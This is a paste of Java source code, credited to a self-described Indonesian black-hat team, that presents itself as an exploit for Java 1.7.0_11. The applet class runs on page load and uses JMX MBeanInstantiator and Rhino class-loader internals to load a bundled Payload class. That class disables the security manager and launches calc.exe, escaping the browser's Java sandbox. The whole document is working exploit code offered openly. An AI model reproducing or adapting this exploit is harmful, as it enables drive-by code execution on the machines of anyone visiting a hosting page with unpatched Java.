ngetes doank =))

1. /*
2. * (Java 1.7.0_11 Exploit)
3. *
4. * Ngetes doank :v
5. *
6. * http://www.facebook.com/Gabby.IndoNesian.BlackHat.Team
7. */
8. import java.applet.Applet;
9. import com.sun.jmx.mbeanserver.Introspector;
10. import com.sun.jmx.mbeanserver.JmxMBeanServer;
11. import com.sun.jmx.mbeanserver.MBeanInstantiator;
12. import java.lang.invoke.MethodHandle;
13. import java.lang.invoke.MethodHandles.Lookup;
14. import java.lang.invoke.MethodType;
15. import java.lang.reflect.InvocationTargetException;
16. import java.lang.reflect.Method;
17. import javax.management.ReflectionException;
18. import java.io.*;
19.  
20. public class PaunchGift extends Applet
21. {
22.  
23. public void init()
24. {
25.  
26. try
27. {
28. int length;
29. byte[] buffer = new byte[5000];
30. ByteArrayOutputStream os = new ByteArrayOutputStream();
31.  
32. // read in the class file from the jar
33. InputStream is = getClass().getResourceAsStream("Payload.class");
34.  
35. // and write it out to the byte array stream
36. while( ( length = is.read( buffer ) ) > 0 )
37. os.write( buffer, 0, length );
38.  
39. // convert it to a simple byte array
40. buffer = os.toByteArray();
41.  
42. Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context");
43.  
44. Method method = getMethod(class1, "enter", true);
45. Object obj = method.invoke(null, new Object[0]);
46. Method method1 = getMethod(class1, "createClassLoader", false);
47. Object obj1 = method1.invoke(obj, new Object[1]);
48.  
49. Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
50. Method method2 = getMethod(class2, "defineClass", false);
51.  
52. Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
53. my_class.newInstance();
54. Method m_outSandbox = my_class.getMethod("outSandbox", new Class[0]);
55. m_outSandbox.invoke(null, new Object[] {});
56.  
57. }
58. catch (Throwable localThrowable){}
59.  
60. }
61.  
62.  
63. private Method getMethod(Class class1, String s, boolean flag)
64. {
65. try {
66. Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
67. Method[] amethod1 = amethod;
68.  
69. for (int i = 0; i < amethod1.length; i++) {
70. Method method = amethod1[i];
71. String s1 = method.getName();
72. Class[] aclass = method.getParameterTypes();
73. if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
74. }
75. } catch (Exception localException) { }
76.  
77. return null;
78. }
79.  
80. private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
81. {
82. Object obj = null;
83. JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
84. MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
85.  
86. Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
87. Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
88. return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
89. }
90.  
91. }
92.  
93. ###############################################
94. import java.lang.reflect.Method;
95. import java.security.AccessController;
96. import java.security.PrivilegedExceptionAction;
97.  
98. public class Payload implements PrivilegedExceptionAction
99. {
100.  
101. public Payload()
102. {
103. try
104. {
105. AccessController.doPrivileged(this);
106. }
107. catch(Exception exception) { }
108. }
109.  
110. public Object run() throws Exception
111. {
112. Class cl = System.class;
113. Method m = cl.getMethod("setSecurityManager", new Class[] { SecurityManager.class });
114. m.invoke(null, new Object[1]);
115. return null;
116. }
117.  
118. public static void outSandbox() throws Exception
119. {
120. Runtime.getRuntime().exec("calc.exe");
121. }
122. }